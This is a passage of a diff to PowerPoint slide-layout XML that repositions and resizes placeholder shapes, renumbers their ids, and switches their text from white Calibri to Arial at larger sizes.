+        <p:nvSpPr>
+          <p:cNvPr id="50" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1074,8 +1012,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1086,18 +1024,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="57" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="51" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1107,8 +1042,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="1825560"/>
-            <a:ext cx="5131080" cy="4350960"/>
+            <a:off x="6231960" y="1604520"/>
+            <a:ext cx="5354280" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1119,18 +1054,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="58" name="PlaceHolder 4"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="52" name="PlaceHolder 4"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1140,8 +1072,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="4098240"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="609480" y="3682080"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1152,11 +1084,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -1185,7 +1114,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="5" name="PlaceHolder 1"/>
+          <p:cNvPr id="2" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1195,8 +1124,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1205,18 +1134,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1226,8 +1153,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="10515240" cy="4350960"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="10972440" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1267,7 +1194,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="59" name="PlaceHolder 1"/>
+          <p:cNvPr id="53" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1277,8 +1204,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1287,18 +1214,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="60" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="54" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1308,8 +1233,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="5131080" cy="4350960"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="5354280" cy="3977280"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1320,18 +1245,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="61" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="55" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1341,8 +1263,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="1825560"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="6231960" y="1604520"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1353,18 +1275,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="62" name="PlaceHolder 4"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="56" name="PlaceHolder 4"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1374,8 +1293,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="4098240"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="6231960" y="3682080"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1386,11 +1305,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -1419,7 +1335,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="63" name="PlaceHolder 1"/>
+          <p:cNvPr id="57" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1429,8 +1345,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1439,18 +1355,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="64" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="58" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1460,8 +1374,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1472,18 +1386,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="65" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="59" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1493,8 +1404,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="1825560"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="6231960" y="1604520"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1505,18 +1416,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="66" name="PlaceHolder 4"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="60" name="PlaceHolder 4"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1526,8 +1434,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="4098240"/>
-            <a:ext cx="10515240" cy="2075040"/>
+            <a:off x="609480" y="3682080"/>
+            <a:ext cx="10972440" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1538,11 +1446,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -1571,7 +1476,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="67" name="PlaceHolder 1"/>
+          <p:cNvPr id="61" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1581,8 +1486,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1591,18 +1496,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="68" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="62" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1612,8 +1515,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="10515240" cy="2075040"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="10972440" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1624,18 +1527,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="69" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="63" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1645,8 +1545,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="4098240"/>
-            <a:ext cx="10515240" cy="2075040"/>
+            <a:off x="609480" y="3682080"/>
+            <a:ext cx="10972440" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1657,11 +1557,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -1690,7 +1587,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="70" name="PlaceHolder 1"/>
+          <p:cNvPr id="64" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1700,8 +1597,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1710,18 +1607,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="71" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="65" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1731,8 +1626,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1743,18 +1638,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="72" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="66" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1764,8 +1656,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="1825560"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="6231960" y="1604520"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1776,18 +1668,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="73" name="PlaceHolder 4"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="67" name="PlaceHolder 4"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1797,8 +1686,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="4098240"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="609480" y="3682080"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1809,18 +1698,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="74" name="PlaceHolder 5"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="68" name="PlaceHolder 5"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1830,8 +1716,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="6226200" y="4098240"/>
-            <a:ext cx="5131080" cy="2075040"/>
+            <a:off x="6231960" y="3682080"/>
+            <a:ext cx="5354280" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1842,11 +1728,8 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
             </a:endParaRPr>
           </a:p>
         </p:txBody>
@@ -1875,7 +1758,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="75" name="PlaceHolder 1"/>
+          <p:cNvPr id="69" name="PlaceHolder 1"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1885,8 +1768,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="365040"/>
-            <a:ext cx="10515240" cy="1325160"/>
+            <a:off x="609480" y="273600"/>
+            <a:ext cx="10972440" cy="1144800"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1895,18 +1778,16 @@
         <p:txBody>
           <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="76" name="PlaceHolder 2"/>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="70" name="PlaceHolder 2"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1916,8 +1797,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="838080" y="1825560"/>
-            <a:ext cx="3385800" cy="2075040"/>
+            <a:off x="609480" y="1604520"/>
+            <a:ext cx="3533040" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1928,18 +1809,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="77" name="PlaceHolder 3"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="71" name="PlaceHolder 3"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1949,8 +1827,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="4393440" y="1825560"/>
-            <a:ext cx="3385800" cy="2075040"/>
+            <a:off x="4319640" y="1604520"/>
+            <a:ext cx="3533040" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1961,18 +1839,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="78" name="PlaceHolder 4"/>
+            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="72" name="PlaceHolder 4"/>
           <p:cNvSpPr>
             <a:spLocks noGrp="1"/>
           </p:cNvSpPr>
@@ -1982,8 +1857,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="7949160" y="1825560"/>
-            <a:ext cx="3385800" cy="2075040"/>
+            <a:off x="8029800" y="1604520"/>
+            <a:ext cx="3533040" cy="1896840"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -1994,18 +1869,15 @@
             <a:normAutofit/>
           </a:bodyPr>
           <a:p>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:solidFill>
-                <a:srgbClr val="ffffff"/>
-              </a:solidFill>
-              <a:latin typeface="Calibri"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="79" name="PlaceHolder 5"/>
